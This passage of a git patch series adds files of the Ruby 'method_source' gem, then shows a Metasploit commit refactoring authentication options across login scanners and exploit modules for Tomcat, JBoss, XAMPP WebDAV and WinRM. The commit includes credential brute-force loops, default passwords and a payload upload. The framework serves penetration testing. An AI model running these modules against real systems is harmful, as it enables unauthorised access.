def clear + # @hash.clear + # self + # end + def source + if respond_to?(:source_location) + source = MethodSource.source_helper(source_location) + + raise "Cannot locate source for this method: #{name}" if !source + else + raise "#{self.class}#source not supported by this Ruby version (#{RUBY_VERSION})" + end + + source + end + + # Return the comments associated with the method as a string. + # (This functionality is only supported in Ruby 1.9 and above) + # @return [String] The method's comments as a string + # @example + # Set.instance_method(:clear).comment.display + # => + # # Removes all elements and returns self. + def comment + if respond_to?(:source_location) + comment = MethodSource.comment_helper(source_location) + + raise "Cannot locate source for this method: #{name}" if !comment + else + raise "#{self.class}#comment not supported by this Ruby version (#{RUBY_VERSION})" + end + + comment + end + end +end + +class Method + include MethodSource::SourceLocation::MethodExtensions + include MethodSource::MethodExtensions +end + +class UnboundMethod + include MethodSource::SourceLocation::UnboundMethodExtensions + include MethodSource::MethodExtensions +end + +class Proc + include MethodSource::SourceLocation::ProcExtensions + include MethodSource::MethodExtensions +end + diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb new file mode 100644 index 0000000000..9161854819 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/source_location.rb @@ -0,0 +1,138 @@ +module MethodSource + module ReeSourceLocation + # Ruby enterprise edition provides all the information that's + # needed, in a slightly different way. + def source_location + [__file__, __line__] rescue nil + end + end + + module SourceLocation + module MethodExtensions + if Proc.method_defined? :__file__ + include ReeSourceLocation + + elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ + require 'java' + + # JRuby version source_location hack + # @return [Array] A two element array containing the source location of the method + def source_location + to_java.source_location(Thread.current.to_java.getContext()) + end + else + + + def trace_func(event, file, line, id, binding, classname) + return unless event == 'call' + set_trace_func nil + + @file, @line = file, line + raise :found + end + + private :trace_func + + # Return the source location of a method for Ruby 1.8. + # @return [Array] A two element array. First element is the + # file, second element is the line in the file where the + # method definition is found. + def source_location + if @file.nil? + args =[*(1..(arity<-1 ? -arity-1 : arity ))] + + set_trace_func method(:trace_func).to_proc + call(*args) rescue nil + set_trace_func nil + @file = File.expand_path(@file) if @file && File.exist?(File.expand_path(@file)) + end + return [@file, @line] if File.exist?(@file.to_s) + end + end + end + + module ProcExtensions + if Proc.method_defined? :__file__ + include ReeSourceLocation + + elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /rbx/ + + # Return the source location for a Proc (Rubinius only) + # @return [Array] A two element array. First element is the + # file, second element is the line in the file where the + # proc definition is found. + def source_location + [block.file.to_s, block.line] + end + else + + # Return the source location for a Proc (in implementations + # without Proc#source_location) + # @return [Array] A two element array. First element is the + # file, second element is the line in the file where the + # proc definition is found. + def source_location + self.to_s =~ /@(.*):(\d+)/ + [$1, $2.to_i] + end + end + end + + module UnboundMethodExtensions + if Proc.method_defined? :__file__ + include ReeSourceLocation + + elsif defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ + require 'java' + + # JRuby version source_location hack + # @return [Array] A two element array containing the source location of the method + def source_location + to_java.source_location(Thread.current.to_java.getContext()) + end + + else + + + # Return the source location of an instance method for Ruby 1.8. + # @return [Array] A two element array. First element is the + # file, second element is the line in the file where the + # method definition is found. + def source_location + klass = case owner + when Class + owner + when Module + method_owner = owner + Class.new { include(method_owner) } + end + + # deal with immediate values + case + when klass == Symbol + return :a.method(name).source_location + when klass == Fixnum + return 0.method(name).source_location + when klass == TrueClass + return true.method(name).source_location + when klass == FalseClass + return false.method(name).source_location + when klass == NilClass + return nil.method(name).source_location + end + + begin + Object.instance_method(:method).bind(klass.allocate).call(name).source_location + rescue TypeError + + # Assume we are dealing with a Singleton Class: + # 1. Get the instance object + # 2. Forward the source_location lookup to the instance + instance ||= ObjectSpace.each_object(owner).first + Object.instance_method(:method).bind(instance).call(name).source_location + end + end + end + end + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb new file mode 100644 index 0000000000..b8142bfaef --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/lib/method_source/version.rb @@ -0,0 +1,3 @@ +module MethodSource + VERSION = "0.7.1" +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec new file mode 100644 index 0000000000..83a727d6f6 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/method_source.gemspec @@ -0,0 +1,33 @@ +# -*- encoding: utf-8 -*- + +Gem::Specification.new do |s| + s.name = "method_source" + s.version = "0.7.0" + + s.required_rubygems_version = Gem::Requirement.new(">= 0") if s.respond_to? :required_rubygems_version= + s.authors = ["John Mair (banisterfiend)"] + s.date = "2012-01-01" + s.description = "retrieve the sourcecode for a method" + s.email = "jrmair@gmail.com" + s.files = [".gemtest", ".travis.yml", ".yardopts", "Gemfile", "LICENSE", "README.markdown", "Rakefile", "lib/method_source.rb", "lib/method_source/source_location.rb", "lib/method_source/version.rb", "method_source.gemspec", "test/test.rb", "test/test_helper.rb"] + s.homepage = "http://banisterfiend.wordpress.com" + s.require_paths = ["lib"] + s.rubygems_version = "1.8.10" + s.summary = "retrieve the sourcecode for a method" + s.test_files = ["test/test.rb", "test/test_helper.rb"] + + if s.respond_to? :specification_version then + s.specification_version = 3 + + if Gem::Version.new(Gem::VERSION) >= Gem::Version.new('1.2.0') then + s.add_development_dependency(%q, ["~> 1.1.0"]) + s.add_development_dependency(%q, ["~> 0.9"]) + else + s.add_dependency(%q, ["~> 1.1.0"]) + s.add_dependency(%q, ["~> 0.9"]) + end + else + s.add_dependency(%q, ["~> 1.1.0"]) + s.add_dependency(%q, ["~> 0.9"]) + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb new file mode 100644 index 0000000000..425e56acf9 --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test.rb @@ -0,0 +1,122 @@ +direc = File.dirname(__FILE__) + +require 'rubygems' +require 'bacon' +require "#{direc}/../lib/method_source" +require "#{direc}/test_helper" + +describe MethodSource do + + describe "source_location (testing 1.8 implementation)" do + it 'should return correct source_location for a method' do + method(:hello).source_location.first.should =~ /test_helper/ + end + + it 'should not raise for immediate instance methods' do + [Symbol, Fixnum, TrueClass, FalseClass, NilClass].each do |immediate_class| + lambda { immediate_class.instance_method(:to_s).source_location }.should.not.raise + end + end + + it 'should not raise for immediate methods' do + [:a, 1, true, false, nil].each do |immediate| + lambda { immediate.method(:to_s).source_location }.should.not.raise + end + end + end + + before do + @hello_module_source = " def hello; :hello_module; end\n" + @hello_singleton_source = "def $o.hello; :hello_singleton; end\n" + @hello_source = "def hello; :hello; end\n" + @hello_comment = "# A comment for hello\n# It spans two lines and is indented by 2 spaces\n" + @lambda_comment = "# This is a comment for MyLambda\n" + @lambda_source = "MyLambda = lambda { :lambda }\n" + @proc_source = "MyProc = Proc.new { :proc }\n" + end + + it 'should define methods on Method and UnboundMethod and Proc' do + Method.method_defined?(:source).should == true + UnboundMethod.method_defined?(:source).should == true + Proc.method_defined?(:source).should == true + end + + describe "Methods" do + it 'should return source for method' do + method(:hello).source.should == @hello_source + end + + it 'should return source for a method defined in a module' do + M.instance_method(:hello).source.should == @hello_module_source + end + + it 'should return source for a singleton method as an instance method' do + class << $o; self; end.instance_method(:hello).source.should == @hello_singleton_source + end + + it 'should return source for a singleton method' do + $o.method(:hello).source.should == @hello_singleton_source + end + + + it 'should return a comment for method' do + method(:hello).comment.should == @hello_comment + end + + + if !is_rbx? + it 'should raise for C methods' do + lambda { method(:puts).source }.should.raise RuntimeError + end + end + end + + # if RUBY_VERSION =~ /1.9/ || is_rbx? + describe "Lambdas and Procs" do + it 'should return source for proc' do + MyProc.source.should == @proc_source + end + + it 'should return an empty string if there is no comment' do + MyProc.comment.should == '' + end + + it 'should return source for lambda' do + MyLambda.source.should == @lambda_source + end + + it 'should return comment for lambda' do + MyLambda.comment.should == @lambda_comment + end + end + # end + describe "Comment tests" do + before do + @comment1 = "# a\n# b\n" + @comment2 = "# a\n# b\n" + @comment3 = "# a\n#\n# b\n" + @comment4 = "# a\n# b\n" + @comment5 = "# a\n# b\n# c\n# d\n" + end + + it "should correctly extract multi-line comments" do + method(:comment_test1).comment.should == @comment1 + end + + it "should correctly strip leading whitespace before comments" do + method(:comment_test2).comment.should == @comment2 + end + + it "should keep empty comment lines" do + method(:comment_test3).comment.should == @comment3 + end + + it "should ignore blank lines between comments" do + method(:comment_test4).comment.should == @comment4 + end + + it "should align all comments to same indent level" do + method(:comment_test5).comment.should == @comment5 + end + end +end diff --git a/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb new file mode 100644 index 0000000000..53da4e519c --- /dev/null +++ b/lib/gemcache/ruby/1.9.1/gems/method_source-0.7.1/test/test_helper.rb @@ -0,0 +1,50 @@ +def is_rbx? + defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /rbx/ +end + +def jruby? + defined?(RUBY_ENGINE) && RUBY_ENGINE =~ /jruby/ +end + + +module M + def hello; :hello_module; end +end + +$o = Object.new +def $o.hello; :hello_singleton; end + +# A comment for hello + + # It spans two lines and is indented by 2 spaces +def hello; :hello; end + +# a +# b +def comment_test1; end + + # a + # b +def comment_test2; end + +# a +# +# b +def comment_test3; end + +# a + +# b +def comment_test4; end + + +# a + # b + # c +# d +def comment_test5; end + +# This is a comment for MyLambda +MyLambda = lambda { :lambda } +MyProc = Proc.new { :proc } + From 0ae489b37b34abe3f2fabeeb65deb83922d1c800 Mon Sep 17 00:00:00 2001 From: David Maloney Date: Tue, 19 Feb 2013 23:16:46 -0600 Subject: [PATCH 034/139] last of revert-merge snaffu --- modules/auxiliary/gather/shodan_search.rb | 4 +- .../scanner/http/cisco_device_manager.rb | 4 +- modules/auxiliary/scanner/http/http_login.rb | 186 +++--------------- .../scanner/http/tomcat_mgr_login.rb | 7 +- modules/auxiliary/scanner/winrm/winrm_cmd.rb | 4 - .../auxiliary/scanner/winrm/winrm_login.rb | 6 +- modules/auxiliary/scanner/winrm/winrm_wql.rb | 7 +- modules/auxiliary/server/http_ntlmrelay.rb | 3 +- .../linux/http/piranha_passwd_exec.rb | 6 +- modules/exploits/multi/http/axis2_deployer.rb | 4 +- .../exploits/multi/http/jboss_bshdeployer.rb | 3 - .../exploits/multi/http/jboss_maindeployer.rb | 3 - .../exploits/multi/http/tomcat_mgr_deploy.rb | 14 +- .../unix/webapp/oracle_vm_agent_utl.rb | 3 - modules/exploits/windows/http/easyftp_list.rb | 4 +- .../windows/http/xampp_webdav_upload_php.rb | 10 +- .../windows/winrm/winrm_script_exec.rb | 23 +-- 17 files changed, 52 insertions(+), 239 deletions(-) diff --git a/modules/auxiliary/gather/shodan_search.rb b/modules/auxiliary/gather/shodan_search.rb index 8b114dbdd8..218427cc1f 100644 --- a/modules/auxiliary/gather/shodan_search.rb +++ b/modules/auxiliary/gather/shodan_search.rb @@ -38,10 +38,10 @@ class Metasploit4 < Msf::Auxiliary )) # disabling all the unnecessary options that someone might set to break our query - deregister_options('RPORT','RHOST', 'BasicAuthPass', 'BasicAuthUser', 'DOMAIN', + deregister_options('RPORT','RHOST', 'DOMAIN', 'DigestAuthIIS', 'SSLVersion', 'NTLM::SendLM', 'NTLM::SendNTLM', 'NTLM::SendSPN', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', - 'NTLM::UseNTLMv2', 'DigestAuthPassword', 'DigestAuthUser', 'SSL') + 'NTLM::UseNTLMv2','SSL') register_options( [ diff --git a/modules/auxiliary/scanner/http/cisco_device_manager.rb b/modules/auxiliary/scanner/http/cisco_device_manager.rb index fd57fda9bb..9486262be7 100644 --- a/modules/auxiliary/scanner/http/cisco_device_manager.rb +++ b/modules/auxiliary/scanner/http/cisco_device_manager.rb @@ -26,7 +26,7 @@ class Metasploit3 < Msf::Auxiliary 'Name' => 'Cisco Device HTTP Device Manager Access', 'Description' => %q{ This module gathers data from a Cisco device (router or switch) with the device manager - web interface exposed. The BasicAuthUser and BasicAuthPass options can be used to specify + web interface exposed. The USERNAME and PASSWORD options can be used to specify authentication. }, 'Author' => [ 'hdm' ], @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Auxiliary print_good("#{rhost}:#{rport} Successfully authenticated to this device") # Report a vulnerability only if no password was specified - if datastore['BasicAuthPass'].to_s.length == 0 + if datastore['PASSWORD'].to_s.length == 0 report_vuln( { diff --git a/modules/auxiliary/scanner/http/http_login.rb b/modules/auxiliary/scanner/http/http_login.rb index 5a6b0ab9a6..4324e312f2 100644 --- a/modules/auxiliary/scanner/http/http_login.rb +++ b/modules/auxiliary/scanner/http/http_login.rb @@ -48,9 +48,8 @@ class Metasploit3 < Msf::Auxiliary register_autofilter_ports([ 80, 443, 8080, 8081, 8000, 8008, 8443, 8444, 8880, 8888 ]) end - def find_auth_uri_and_scheme + def find_auth_uri - path_and_scheme = [] if datastore['AUTH_URI'] and datastore['AUTH_URI'].length > 0 paths = [datastore['AUTH_URI']] else @@ -80,21 +79,10 @@ class Metasploit3 < Msf::Auxiliary next if not res end - next if not res.code == 401 - next if not res.headers['WWW-Authenticate'] - path_and_scheme << path - case res.headers['WWW-Authenticate'] - when /Basic/i - path_and_scheme << "Basic" - when /NTLM/i - path_and_scheme << "NTLM" - when /Digest/i - path_and_scheme << "Digest" - end - return path_and_scheme + return path end - return path_and_scheme + return path end def target_url @@ -111,7 +99,7 @@ class Metasploit3 < Msf::Auxiliary print_error("You need need to set AUTH_URI when using PUT Method !") return end - @uri, @scheme = find_auth_uri_and_scheme() + @uri = find_auth_uri if ! @uri print_error("#{target_url} No URI found that asks for HTTP authentication") return @@ -119,12 +107,7 @@ class Metasploit3 < Msf::Auxiliary @uri = "/#{@uri}" if @uri[0,1] != "/" - if ! @scheme - print_error("#{target_url} Incompatible authentication scheme") - return - end - - print_status("Attempting to login to #{target_url} with #{@scheme} authentication") + print_status("Attempting to login to #{target_url}") each_user_pass { |user, pass| do_login(user, pass) @@ -133,27 +116,21 @@ class Metasploit3 < Msf::Auxiliary def do_login(user='admin', pass='admin') vprint_status("#{target_url} - Trying username:'#{user}' with password:'#{pass}'") - success = false - proof = "" - - ret = do_http_login(user,pass,@scheme) - return :abort if ret == :abort - if ret == :success - proof = @proof.dup - success = true - end - - if success + + response = do_http_login(user,pass) + result = determine_result(response) + + if result == :success print_good("#{target_url} - Successful login '#{user}' : '#{pass}'") any_user = false any_pass = false vprint_status("#{target_url} - Trying random username with password:'#{pass}'") - any_user = do_http_login(Rex::Text.rand_text_alpha(8), pass, @scheme) + any_user = determine_result(do_http_login(Rex::Text.rand_text_alpha(8), pass)) vprint_status("#{target_url} - Trying username:'#{user}' with random password") - any_pass = do_http_login(user, Rex::Text.rand_text_alpha(8), @scheme) + any_pass = determine_result(do_http_login(user, Rex::Text.rand_text_alpha(8))) if any_user == :success user = "anyuser" @@ -175,7 +152,7 @@ class Metasploit3 < Msf::Auxiliary :sname => (ssl ? 'https' : 'http'), :user => user, :pass => pass, - :proof => "WEBAPP=\"Generic\", PROOF=#{proof}", + :proof => "WEBAPP=\"Generic\", PROOF=#{response.to_s}", :source_type => "user_supplied", :active => true ) @@ -188,142 +165,25 @@ class Metasploit3 < Msf::Auxiliary end end - def do_http_login(user,pass,scheme) - case scheme - when /NTLM/i - do_http_auth_ntlm(user,pass) - when /Digest/i - do_http_auth_digest(user,pass,datastore['REQUESTTYPE']) - when /Basic/i - do_http_auth_basic(user,pass) - else - vprint_error("#{target_url}: Unknown authentication scheme") - return :abort - end - end - - def do_http_auth_ntlm(user,pass) + def do_http_login(user,pass) begin - resp,c = send_http_auth_ntlm( + response = send_request_cgi({ 'uri' => @uri, + 'method' => datastore['REQUESTTYPE'], 'username' => user, 'password' => pass - ) - c.close - return :abort if (resp.code == 404) - - if [200, 301, 302].include?(resp.code) - @proof = resp - return :success - end - + }) + return response rescue ::Rex::ConnectionError vprint_error("#{target_url} - Failed to connect to the web server") - return :abort + return nil end - - return :fail end - def do_http_auth_basic(user,pass) - user_pass = Rex::Text.encode_base64(user + ":" + pass) - - begin - res = send_request_cgi({ - 'uri' => @uri, - 'method' => 'GET', - 'headers' => - { - 'Authorization' => "Basic #{user_pass}", - } - }, 25) - - unless (res.kind_of? Rex::Proto::Http::Response) - vprint_error("#{target_url} not responding") - return :abort - end - - return :abort if (res.code == 404) - - if [200, 301, 302].include?(res.code) - @proof = res - return :success - end - - rescue ::Rex::ConnectionError - vprint_error("#{target_url} - Failed to connect to the web server") - return :abort - end - - return :fail - end - - def do_http_auth_digest(user,pass,requesttype) - path = datastore['AUTH_URI'] || "/" - begin - if requesttype == "PUT" - res,c = send_digest_request_cgi({ - 'uri' => path, - 'method' => requesttype, - 'data' => 'Test123\r\n', - #'DigestAuthIIS' => false, - 'DigestAuthUser' => user, - 'DigestAuthPassword' => pass - }, 25) - elsif requesttype == "PROPFIND" - res,c = send_digest_request_cgi({ - 'uri' => path, - 'method' => requesttype, - 'data' => '', - #'DigestAuthIIS' => false, - 'DigestAuthUser' => user, - 'DigestAuthPassword' => pass, - 'headers' => { 'Depth' => '0'} - }, 25) - else - res,c = send_digest_request_cgi({ - 'uri' => path, - 'method' => requesttype, - #'DigestAuthIIS' => false, - 'DigestAuthUser' => user, - 'DigestAuthPassword' => pass - }, 25) - end - - unless (res.kind_of? Rex::Proto::Http::Response) - vprint_error("#{target_url} not responding") - return :abort - end - - return :abort if (res.code == 404) - - if ( [200, 301, 302].include?(res.code) ) or (res.code == 201) - if ((res.code == 201) and (requesttype == "PUT")) - print_good("Trying to delete #{path}") - del_res,c = send_digest_request_cgi({ - 'uri' => path, - 'method' => 'DELETE', - 'DigestAuthUser' => user, - 'DigestAuthPassword' => pass - }, 25) - if not (del_res.code == 204) - print_error("#{path} could be created, but not deleted again. This may have been noisy ...") - end - end - @proof = res - return :success - end - - if (res.code == 207) and (requesttype == "PROPFIND") - @proof = res - return :success - end - - rescue ::Rex::ConnectionError - vprint_error("#{target_url} - Failed to connect to the web server") - return :abort - end - + def determine_result(response) + return :abort unless response.kind_of? Rex::Proto::Http::Response + return :abort unless response.code + return :success if [200, 301, 302].include?(response.code) return :fail end diff --git a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb index 65ab691e66..a3581d16b0 100644 --- a/modules/auxiliary/scanner/http/tomcat_mgr_login.rb +++ b/modules/auxiliary/scanner/http/tomcat_mgr_login.rb @@ -101,16 +101,13 @@ class Metasploit3 < Msf::Auxiliary vprint_status("#{rhost}:#{rport} - Trying username:'#{user}' with password:'#{pass}'") success = false srvhdr = '?' - user_pass = Rex::Text.encode_base64(user + ":" + pass) uri = normalize_uri(datastore['URI']) begin res = send_request_cgi({ 'uri' => uri, 'method' => 'GET', - 'headers' => - { - 'Authorization' => "Basic #{user_pass}", - } + 'username' => user, + 'password' => pass }, 25) unless (res.kind_of? Rex::Proto::Http::Response) vprint_error("http://#{rhost}:#{rport}#{uri} not responding") diff --git a/modules/auxiliary/scanner/winrm/winrm_cmd.rb b/modules/auxiliary/scanner/winrm/winrm_cmd.rb index 12f0c70422..88e9e717d6 100644 --- a/modules/auxiliary/scanner/winrm/winrm_cmd.rb +++ b/modules/auxiliary/scanner/winrm/winrm_cmd.rb @@ -40,10 +40,6 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - unless accepts_ntlm_auth - print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" - return - end streams = winrm_run_cmd(datastore['CMD']) return unless streams.class == Hash print_error streams['stderr'] unless streams['stderr'] == '' diff --git a/modules/auxiliary/scanner/winrm/winrm_login.rb b/modules/auxiliary/scanner/winrm/winrm_login.rb index d8012fb723..946903113e 100644 --- a/modules/auxiliary/scanner/winrm/winrm_login.rb +++ b/modules/auxiliary/scanner/winrm/winrm_login.rb @@ -39,12 +39,8 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - unless accepts_ntlm_auth - print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" - return - end each_user_pass do |user, pass| - resp,c = send_request_ntlm(test_request) + resp = send_winrm_request(test_request) if resp.nil? print_error "#{ip}:#{rport}: Got no reply from the server, connection may have timed out" return diff --git a/modules/auxiliary/scanner/winrm/winrm_wql.rb b/modules/auxiliary/scanner/winrm/winrm_wql.rb index ed09cfd583..0c5eeb6274 100644 --- a/modules/auxiliary/scanner/winrm/winrm_wql.rb +++ b/modules/auxiliary/scanner/winrm/winrm_wql.rb @@ -42,12 +42,7 @@ class Metasploit3 < Msf::Auxiliary def run_host(ip) - unless accepts_ntlm_auth - print_error "The Remote WinRM server (#{ip} does not appear to allow Negotiate(NTLM) auth" - return - end - - resp,c = send_request_ntlm(winrm_wql_msg(datastore['WQL'])) + resp = send_winrm_request(winrm_wql_msg(datastore['WQL'])) if resp.nil? print_error "Got no reply from the server" return diff --git a/modules/auxiliary/server/http_ntlmrelay.rb b/modules/auxiliary/server/http_ntlmrelay.rb index fda08e41c4..080803918b 100644 --- a/modules/auxiliary/server/http_ntlmrelay.rb +++ b/modules/auxiliary/server/http_ntlmrelay.rb @@ -84,8 +84,7 @@ class Metasploit3 < Msf::Auxiliary 'IPC$,ADMIN$,C$,D$,CCMLOGS$,ccmsetup$,share,netlogon,sysvol']) ], self.class) - deregister_options('BasicAuthPass', 'BasicAuthUser', 'DOMAIN', 'DigestAuthPassword', - 'DigestAuthUser', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey', + deregister_options('DOMAIN', 'NTLM::SendLM', 'NTLM::SendSPN', 'NTLM::SendNTLM', 'NTLM::UseLMKey', 'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2') end diff --git a/modules/exploits/linux/http/piranha_passwd_exec.rb b/modules/exploits/linux/http/piranha_passwd_exec.rb index d87027cadb..85ff71eca8 100644 --- a/modules/exploits/linux/http/piranha_passwd_exec.rb +++ b/modules/exploits/linux/http/piranha_passwd_exec.rb @@ -72,8 +72,8 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ - OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'piranha']), - OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'q']), + OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'piranha']), + OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'q']) ], self.class) end @@ -96,7 +96,7 @@ class Metasploit3 < Msf::Exploit::Remote end if res.code == 401 - print_error("401 Authorization Required! Our BasicAuthUser and BasicAuthPass credentials not accepted!") + print_error("401 Authorization Required! Our Credentials not accepted!") elsif (res.code == 200 and res.body =~ /The passwords you supplied match/) print_status("Command successfully executed (according to the server).") end diff --git a/modules/exploits/multi/http/axis2_deployer.rb b/modules/exploits/multi/http/axis2_deployer.rb index 565d73a293..9f030bbbc2 100644 --- a/modules/exploits/multi/http/axis2_deployer.rb +++ b/modules/exploits/multi/http/axis2_deployer.rb @@ -227,9 +227,7 @@ class Metasploit3 < Msf::Exploit::Remote authmsg = res.headers['WWW-Authenticate'] end print_error("The remote server responded expecting authentication") - if datastore['BasicAuthUser'] and datastore['BasicAuthPass'] - print_error("BasicAuthUser \"%s\" failed to authenticate" % datastore['BasicAuthUser']) - elsif authmsg + if authmsg print_error("WWW-Authenticate: %s" % authmsg) end cleanup_instructions(rpath, name) # display cleanup info diff --git a/modules/exploits/multi/http/jboss_bshdeployer.rb b/modules/exploits/multi/http/jboss_bshdeployer.rb index 07d5eb2ada..f350fe4984 100644 --- a/modules/exploits/multi/http/jboss_bshdeployer.rb +++ b/modules/exploits/multi/http/jboss_bshdeployer.rb @@ -96,9 +96,6 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8)) app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8)) diff --git a/modules/exploits/multi/http/jboss_maindeployer.rb b/modules/exploits/multi/http/jboss_maindeployer.rb index 7c36c1fa16..2297b52569 100644 --- a/modules/exploits/multi/http/jboss_maindeployer.rb +++ b/modules/exploits/multi/http/jboss_maindeployer.rb @@ -123,9 +123,6 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - jsp_name = datastore['JSP'] || rand_text_alpha(8+rand(8)) app_base = datastore['APPBASE'] || rand_text_alpha(8+rand(8)) diff --git a/modules/exploits/multi/http/tomcat_mgr_deploy.rb b/modules/exploits/multi/http/tomcat_mgr_deploy.rb index a46cd2c033..2757cb6e13 100644 --- a/modules/exploits/multi/http/tomcat_mgr_deploy.rb +++ b/modules/exploits/multi/http/tomcat_mgr_deploy.rb @@ -112,9 +112,6 @@ class Metasploit3 < Msf::Exploit::Remote end def check - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - res = query_serverinfo disconnect return CheckCode::Unknown if res.nil? @@ -127,8 +124,8 @@ class Metasploit3 < Msf::Exploit::Remote :host => rhost, :port => rport, :sname => (ssl ? "https" : "http"), - :user => datastore['BasicAuthUser'], - :pass => datastore['BasicAuthPass'], + :user => datastore['USERNAME'], + :pass => datastore['PASSWORD'], :proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}", :active => true ) @@ -164,9 +161,6 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - mytarget = target if (target.name =~ /Automatic/) mytarget = auto_target @@ -221,8 +215,8 @@ class Metasploit3 < Msf::Exploit::Remote :host => rhost, :port => rport, :sname => (ssl ? "https" : "http"), - :user => datastore['BasicAuthUser'], - :pass => datastore['BasicAuthPass'], + :user => datastore['USERNAME'], + :pass => datastore['PASSWORD'], :proof => "WEBAPP=\"Tomcat Manager App\", VHOST=#{vhost}, PATH=#{datastore['PATH']}", :active => true ) diff --git a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb index 9865c8716b..3bfd6c668e 100644 --- a/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb +++ b/modules/exploits/unix/webapp/oracle_vm_agent_utl.rb @@ -67,9 +67,6 @@ class Metasploit3 < Msf::Exploit::Remote end def go(command) - datastore['BasicAuthUser'] = datastore['USERNAME'] - datastore['BasicAuthPass'] = datastore['PASSWORD'] - xml = <<-EOS diff --git a/modules/exploits/windows/http/easyftp_list.rb b/modules/exploits/windows/http/easyftp_list.rb index 3484cdf86f..e162cd74f6 100644 --- a/modules/exploits/windows/http/easyftp_list.rb +++ b/modules/exploits/windows/http/easyftp_list.rb @@ -72,8 +72,8 @@ class Metasploit3 < Msf::Exploit::Remote register_options( [ Opt::RPORT(8080), - OptString.new('BasicAuthUser', [true, 'The HTTP username to specify for basic authentication', 'anonymous']), - OptString.new('BasicAuthPass', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com']), + OptString.new('USERNAME', [true, 'The HTTP username to specify for basic authentication', 'anonymous']), + OptString.new('PASSWORD', [true, 'The HTTP password to specify for basic authentication', 'mozilla@example.com']) ], self.class) end diff --git a/modules/exploits/windows/http/xampp_webdav_upload_php.rb b/modules/exploits/windows/http/xampp_webdav_upload_php.rb index c19096b2c8..f5b21a0499 100644 --- a/modules/exploits/windows/http/xampp_webdav_upload_php.rb +++ b/modules/exploits/windows/http/xampp_webdav_upload_php.rb @@ -36,8 +36,8 @@ class Metasploit3 < Msf::Exploit::Remote [ OptString.new('PATH', [ true, "The path to attempt to upload", '/webdav/']), OptString.new('FILENAME', [ false , "The filename to give the payload. (Leave Blank for Random)"]), - OptString.new('RUSER', [ true, "The Username to use for Authentication", 'wampp']), - OptString.new('RPASS', [ true, "The Password to use for Authentication", 'xampp']) + OptString.new('USERNAME', [false, 'The HTTP username to specify for authentication', 'wampp']), + OptString.new('PASSWORD', [false, 'The HTTP password to specify for authentication', 'xampp']) ], self.class) end @@ -46,12 +46,12 @@ class Metasploit3 < Msf::Exploit::Remote def exploit uri = build_path print_status "Uploading Payload to #{uri}" - res,c = send_digest_request_cgi({ + res = send_request_cgi({ 'uri' => uri, 'method' => 'PUT', 'data' => payload.raw, - 'DigestAuthUser' => datastore['RUSER'], - 'DigestAuthPassword' => datastore['RPASS'] + 'username' => datastore['USERNAME'], + 'password' => datastore['PASSWORD'] }, 25) unless (res and res.code == 201) print_error "Failed to upload file!" diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb index 666ca66d3d..c53314f136 100644 --- a/modules/exploits/windows/winrm/winrm_script_exec.rb +++ b/modules/exploits/windows/winrm/winrm_script_exec.rb @@ -66,20 +66,7 @@ class Metasploit3 < Msf::Exploit::Remote @compat_mode = false end - def check - unless accepts_ntlm_auth - print_error "The Remote WinRM server does not appear to allow Negotiate (NTLM) auth" - return Msf::Exploit::CheckCode::Safe - end - - return Msf::Exploit::CheckCode::Vulnerable - end - - def 